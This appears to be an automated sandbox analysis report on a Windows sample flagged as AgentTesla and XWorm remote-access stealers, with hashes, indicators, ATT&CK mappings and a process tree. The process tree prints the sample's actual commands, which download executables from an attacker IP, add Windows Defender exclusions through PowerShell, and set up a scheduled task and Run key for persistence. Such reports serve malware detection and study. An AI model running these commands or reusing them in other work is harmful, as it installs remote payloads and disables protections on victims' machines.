agenttesla | e1c064d2472fffaff3b9566f473d5b43310d2643d0d98f364f81c6610e2ed0b5

Analysis

max time kernel
210s
max time network
262s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
14-05-2024 15:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loadder.exe
Size

98KB
MD5

7ed8bf17132c1003da9e1fc473b1d0f7
SHA1

e3d1754dbca2398977d0d1fb2b331168025da86c
SHA256

e1c064d2472fffaff3b9566f473d5b43310d2643d0d98f364f81c6610e2ed0b5
SHA512

cdaed8d1f7ddaa3a21c6a42ccca3b2881e562cfeffcd4bcc6f05b48581b138bf579bcdc38b0a71694a34cdc792686f7c8f3f51c7c5e6aca1370ae5ba034dacf9
SSDEEP

1536:T7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIf9weLHlD/gap4KO8:P7DhdC6kzWypvaQ0FxyNTBf9xx/4W

Score

10^/10

agenttesla xworm execution keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
wlms.exe
pastebin_url
https://pastebin.com/raw/Xuc6dzua

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001900000002ab54-5.dat	family_xworm
behavioral1/memory/2700-8-0x0000000000700000-0x0000000000716000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

AgentTesla payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001c00000002ac9d-1352.dat	family_agenttesla
behavioral1/memory/3152-1354-0x0000000006970000-0x0000000006B84000-memory.dmp	family_agenttesla

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
664	powershell.exe
4940	powershell.exe
5040	powershell.exe
816	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 12 IoCs

pid	Process
2700	wlms.exe
4524	wlms.exe
2336	wlms.exe
3596	rar.exe
3152	Synapse.exe
3168	CefSharp.BrowserSubprocess.exe
4592	CefSharp.BrowserSubprocess.exe
3268	CefSharp.BrowserSubprocess.exe
5000	CefSharp.BrowserSubprocess.exe
3908	CefSharp.BrowserSubprocess.exe
4232	CefSharp.BrowserSubprocess.exe
3620	wlms.exe

Loads dropped DLL 61 IoCs

pid	Process
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3152	Synapse.exe
3168	CefSharp.BrowserSubprocess.exe
3168	CefSharp.BrowserSubprocess.exe
3168	CefSharp.BrowserSubprocess.exe
3168	CefSharp.BrowserSubprocess.exe
3168	CefSharp.BrowserSubprocess.exe
3168	CefSharp.BrowserSubprocess.exe
3168	CefSharp.BrowserSubprocess.exe
3268	CefSharp.BrowserSubprocess.exe
3268	CefSharp.BrowserSubprocess.exe
3268	CefSharp.BrowserSubprocess.exe
3268	CefSharp.BrowserSubprocess.exe
3268	CefSharp.BrowserSubprocess.exe
3268	CefSharp.BrowserSubprocess.exe
3268	CefSharp.BrowserSubprocess.exe
5000	CefSharp.BrowserSubprocess.exe
5000	CefSharp.BrowserSubprocess.exe
5000	CefSharp.BrowserSubprocess.exe
5000	CefSharp.BrowserSubprocess.exe
5000	CefSharp.BrowserSubprocess.exe
5000	CefSharp.BrowserSubprocess.exe
5000	CefSharp.BrowserSubprocess.exe
4592	CefSharp.BrowserSubprocess.exe
4592	CefSharp.BrowserSubprocess.exe
4592	CefSharp.BrowserSubprocess.exe
4592	CefSharp.BrowserSubprocess.exe
4592	CefSharp.BrowserSubprocess.exe
4592	CefSharp.BrowserSubprocess.exe
4592	CefSharp.BrowserSubprocess.exe
4232	CefSharp.BrowserSubprocess.exe
4232	CefSharp.BrowserSubprocess.exe
4232	CefSharp.BrowserSubprocess.exe
4232	CefSharp.BrowserSubprocess.exe
4232	CefSharp.BrowserSubprocess.exe
3908	CefSharp.BrowserSubprocess.exe
3908	CefSharp.BrowserSubprocess.exe
4232	CefSharp.BrowserSubprocess.exe
4232	CefSharp.BrowserSubprocess.exe
3908	CefSharp.BrowserSubprocess.exe
3908	CefSharp.BrowserSubprocess.exe
3908	CefSharp.BrowserSubprocess.exe
3168	CefSharp.BrowserSubprocess.exe
3908	CefSharp.BrowserSubprocess.exe
3908	CefSharp.BrowserSubprocess.exe
3168	CefSharp.BrowserSubprocess.exe
3168	CefSharp.BrowserSubprocess.exe
3168	CefSharp.BrowserSubprocess.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\wlms = "C:\\Users\\Admin\\AppData\\Roaming\\wlms.exe"	wlms.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	pastebin.com
6	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	Synapse.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5024	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3948	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Synapse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Synapse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	Synapse.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4208	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
664	powershell.exe
664	powershell.exe
4940	powershell.exe
4940	powershell.exe
5040	powershell.exe
5040	powershell.exe
816	powershell.exe
816	powershell.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe
2700	wlms.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2700	wlms.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

description	pid	Process
Token: SeDebugPrivilege	2700	wlms.exe
Token: SeDebugPrivilege	664	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeDebugPrivilege	816	powershell.exe
Token: SeDebugPrivilege	4524	wlms.exe
Token: SeDebugPrivilege	2336	wlms.exe
Token: SeDebugPrivilege	3152	Synapse.exe
Token: SeDebugPrivilege	3168	CefSharp.BrowserSubprocess.exe
Token: SeDebugPrivilege	4592	CefSharp.BrowserSubprocess.exe
Token: SeDebugPrivilege	3268	CefSharp.BrowserSubprocess.exe
Token: SeDebugPrivilege	5000	CefSharp.BrowserSubprocess.exe
Token: SeDebugPrivilege	3908	CefSharp.BrowserSubprocess.exe
Token: SeShutdownPrivilege	3152	Synapse.exe
Token: SeCreatePagefilePrivilege	3152	Synapse.exe
Token: SeDebugPrivilege	4232	CefSharp.BrowserSubprocess.exe
Token: SeShutdownPrivilege	3152	Synapse.exe
Token: SeCreatePagefilePrivilege	3152	Synapse.exe
Token: SeShutdownPrivilege	3152	Synapse.exe
Token: SeCreatePagefilePrivilege	3152	Synapse.exe
Token: SeShutdownPrivilege	3152	Synapse.exe
Token: SeCreatePagefilePrivilege	3152	Synapse.exe
Token: SeShutdownPrivilege	3152	Synapse.exe
Token: SeCreatePagefilePrivilege	3152	Synapse.exe
Token: SeShutdownPrivilege	3152	Synapse.exe
Token: SeCreatePagefilePrivilege	3152	Synapse.exe
Token: SeShutdownPrivilege	3152	Synapse.exe
Token: SeCreatePagefilePrivilege	3152	Synapse.exe
Token: SeShutdownPrivilege	3152	Synapse.exe
Token: SeCreatePagefilePrivilege	3152	Synapse.exe
Token: SeDebugPrivilege	3620	wlms.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2700	wlms.exe
3288	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 4784 wrote to memory of 1004	4784	Loadder.exe	81
PID 4784 wrote to memory of 1004	4784	Loadder.exe	81
PID 1004 wrote to memory of 3812	1004	cmd.exe	82
PID 1004 wrote to memory of 3812	1004	cmd.exe	82
PID 1004 wrote to memory of 4192	1004	cmd.exe	83
PID 1004 wrote to memory of 4192	1004	cmd.exe	83
PID 1004 wrote to memory of 2700	1004	cmd.exe	84
PID 1004 wrote to memory of 2700	1004	cmd.exe	84
PID 2700 wrote to memory of 664	2700	wlms.exe	88
PID 2700 wrote to memory of 664	2700	wlms.exe	88
PID 2700 wrote to memory of 4940	2700	wlms.exe	90
PID 2700 wrote to memory of 4940	2700	wlms.exe	90
PID 2700 wrote to memory of 5040	2700	wlms.exe	92
PID 2700 wrote to memory of 5040	2700	wlms.exe	92
PID 2700 wrote to memory of 816	2700	wlms.exe	94
PID 2700 wrote to memory of 816	2700	wlms.exe	94
PID 2700 wrote to memory of 5024	2700	wlms.exe	96
PID 2700 wrote to memory of 5024	2700	wlms.exe	96
PID 1004 wrote to memory of 1356	1004	cmd.exe	98
PID 1004 wrote to memory of 1356	1004	cmd.exe	98
PID 1004 wrote to memory of 868	1004	cmd.exe	109
PID 1004 wrote to memory of 868	1004	cmd.exe	109
PID 1004 wrote to memory of 3596	1004	cmd.exe	110
PID 1004 wrote to memory of 3596	1004	cmd.exe	110
PID 1004 wrote to memory of 3152	1004	cmd.exe	112
PID 1004 wrote to memory of 3152	1004	cmd.exe	112
PID 1004 wrote to memory of 3152	1004	cmd.exe	112
PID 3152 wrote to memory of 3168	3152	Synapse.exe	113
PID 3152 wrote to memory of 3168	3152	Synapse.exe	113
PID 3152 wrote to memory of 3168	3152	Synapse.exe	113
PID 3152 wrote to memory of 4592	3152	Synapse.exe	114
PID 3152 wrote to memory of 4592	3152	Synapse.exe	114
PID 3152 wrote to memory of 4592	3152	Synapse.exe	114
PID 3152 wrote to memory of 3268	3152	Synapse.exe	115
PID 3152 wrote to memory of 3268	3152	Synapse.exe	115
PID 3152 wrote to memory of 3268	3152	Synapse.exe	115
PID 3152 wrote to memory of 5000	3152	Synapse.exe	116
PID 3152 wrote to memory of 5000	3152	Synapse.exe	116
PID 3152 wrote to memory of 5000	3152	Synapse.exe	116
PID 3152 wrote to memory of 3908	3152	Synapse.exe	117
PID 3152 wrote to memory of 3908	3152	Synapse.exe	117
PID 3152 wrote to memory of 3908	3152	Synapse.exe	117
PID 3152 wrote to memory of 4232	3152	Synapse.exe	118
PID 3152 wrote to memory of 4232	3152	Synapse.exe	118
PID 3152 wrote to memory of 4232	3152	Synapse.exe	118
PID 2700 wrote to memory of 4824	2700	wlms.exe	120
PID 2700 wrote to memory of 4824	2700	wlms.exe	120
PID 2700 wrote to memory of 4548	2700	wlms.exe	122
PID 2700 wrote to memory of 4548	2700	wlms.exe	122
PID 4548 wrote to memory of 3948	4548	cmd.exe	124
PID 4548 wrote to memory of 3948	4548	cmd.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Loadder.exe
"C:\Users\Admin\AppData\Local\Temp\Loadder.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4784
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\665B.tmp\665C.tmp\665D.bat C:\Users\Admin\AppData\Local\Temp\Loadder.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1004
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:3812
- - C:\Windows\system32\curl.exe
    curl -s -o wlms.exe "http://188.212.100.60:54391/download/wlms.exe"
    3⤵
    PID:4192
- - C:\ProgramData\Google\wlms.exe
    wlms.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\wlms.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wlms.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\wlms.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wlms.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:816
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wlms" /tr "C:\Users\Admin\AppData\Roaming\wlms.exe"
      4⤵
      Creates scheduled task(s)
      PID:5024
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /delete /f /tn "wlms"
      4⤵
      PID:4824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8F03.tmp.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4548
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:3948
- - C:\Windows\system32\curl.exe
    curl -s -o Synapse.rar "http://188.212.100.60:54391/download/Debug.rar"
    3⤵
    PID:1356
- - C:\Windows\system32\curl.exe
    curl -s -o rar.exe "http://188.212.100.60:54391/download/rar.exe"
    3⤵
    PID:868
- - C:\Users\Public\rar.exe
    rar.exe x -y Synapse.rar
    3⤵
    - Executes dropped EXE
    PID:3596
- - C:\Users\Public\Debug\Synapse.exe
    C:\Users\Public\Debug\Synapse.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3152
  - - C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe
      "C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe" --type=gpu-process --no-sandbox --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Public\Debug\debug.log" --mojo-platform-channel-handle=2176 --field-trial-handle=2180,i,4926616882122362207,11465835239407335812,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version /prefetch:2 --host-process-id=3152
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:3168
  - - C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe
      "C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --log-file="C:\Users\Public\Debug\debug.log" --mojo-platform-channel-handle=2960 --field-trial-handle=2180,i,4926616882122362207,11465835239407335812,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version /prefetch:8 --host-process-id=3152
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:4592
  - - C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe
      "C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --log-file="C:\Users\Public\Debug\debug.log" --mojo-platform-channel-handle=2968 --field-trial-handle=2180,i,4926616882122362207,11465835239407335812,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version /prefetch:8 --host-process-id=3152
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:3268
  - - C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe
      "C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --first-renderer-process --no-sandbox --log-file="C:\Users\Public\Debug\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3176 --field-trial-handle=2180,i,4926616882122362207,11465835239407335812,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --host-process-id=3152 /prefetch:1
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:5000
  - - C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe
      "C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --no-sandbox --log-file="C:\Users\Public\Debug\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3180 --field-trial-handle=2180,i,4926616882122362207,11465835239407335812,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --host-process-id=3152 /prefetch:1
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:3908
  - - C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe
      "C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --no-sandbox --log-file="C:\Users\Public\Debug\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3288 --field-trial-handle=2180,i,4926616882122362207,11465835239407335812,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --host-process-id=3152 /prefetch:1
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:4232

C:\Users\Admin\AppData\Roaming\wlms.exe
C:\Users\Admin\AppData\Roaming\wlms.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4608

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\StepInstall.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4208

C:\Users\Admin\AppData\Roaming\wlms.exe
C:\Users\Admin\AppData\Roaming\wlms.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3288

C:\Users\Admin\AppData\Roaming\wlms.exe
C:\Users\Admin\AppData\Roaming\wlms.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Google\wlms.exe

Filesize
63KB

MD5
74820650cbe9027cbd4766d9ef53af42

SHA1
d97e675f6526f38ac2b7b7fe720dda538217f3a3

SHA256
552b0815f8d176917fa1d0006b72079be0ee1aa2ba7adceffb97f6dd963fb142

SHA512
28a34dbe459e21fd01fff30dcc63f2d3c9083ffd04f221aeba9de3401b24b90f6af90bf8929a6ad186d856051bf5d87053e0c1ee8ebc03e752ff3e59ee639f3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wlms.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
051a74485331f9d9f5014e58ec71566c

SHA1
4ed0256a84f2e95609a0b4d5c249bca624db8fe4

SHA256
3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888

SHA512
1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e47c3fa11e796c492a8388c946bf1636

SHA1
4a090378f0db26c6f019c9203f5b27f12fa865c7

SHA256
4bb861850395dcc3bec4691e8b9f0fa733b8a2d568d460a9201d65250b12fee1

SHA512
8d4af4eba3019cd060561f42cff11374eafe59da5e5ad677e41d0b9198b87d6d13706e760d13c70574ed1384993a1597f886d21fe6ecd0186379a1e93db30695

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
18951ad4190ed728ba23e932e0c6e0db

SHA1
fa2d16fcbc3defd07cb8f21d8ea4793a21f261f0

SHA256
66607b009c345a8e70fc1e58ab8a13bbea0e370c8d75f16d2cce5b876a748915

SHA512
a67237089efa8615747bdc6cfe0afc977dc54cfd624a8d2e5124a441c204f1ec58ee7cfbbc105ddc2c18d4f254b9e124d71630bcdba0253d41a96890104f2fff

Download Submit
C:\Users\Admin\AppData\Local\Temp\665B.tmp\665C.tmp\665D.bat

Filesize
5KB

MD5
08ef42f936369ad2ba20aaee25d4c18b

SHA1
6607dbfba6b86440962428d6e95bd05a86941c7d

SHA256
823cd130f2b0b2419635fad842c3ada15151a864c606c19ee5e2d4c3c626a770

SHA512
a9b40f29f5b1452a36b8acb3ef3020396168bbfa4281c4e025fbd397bb08f9c27465bc047d2c8b0485064cfaaa9f68e58826c397b2ed0b57a797fd5688f3f151

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkceo3m4.mxo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Debug\CefSharp.BrowserSubprocess.Core.dll

Filesize
911KB

MD5
158169f861667e0a83a49ec3c6529ea7

SHA1
0ebca22bb806f1334dcbcd0e77726845d0c79ef8

SHA256
a4ef953ec8ab1014f10569d7b33fe8133e65189e0b9f3ffe1e7248b03418f89b

SHA512
d3a56e43703c762aca635f0d8b5f730ee70a930eb88b3f6ec9c6bd16c11eefec8efbcd83983078c061945be04bb9eb9c90a9e6a22cc1fb09fbbeb6d86c8a0913

Download Submit
C:\Users\Public\Debug\CefSharp.BrowserSubprocess.exe

Filesize
7KB

MD5
6a418a97aaffc2232182aba206cc49ce

SHA1
8e304dced0eca69d4d13e6f9f43bb0c515845ab3

SHA256
13d3300b9418aea98ee275b38ddcbc56ec5024a78f10b135b244e86412f21921

SHA512
d3c48a7a93b4a7c85ef75537f5d532746be6bb57470e6237247717691b4950c767a723f7254c6dad89253e67212b9036c84109d30118e5c476bb96d3f5b3dc64

Download Submit
C:\Users\Public\Debug\CefSharp.Core.Runtime.dll

Filesize
1.3MB

MD5
69a63e6358aec5c6bf504cae959910a2

SHA1
2b6769e68b53cbb17e83701dad126c6e57433052

SHA256
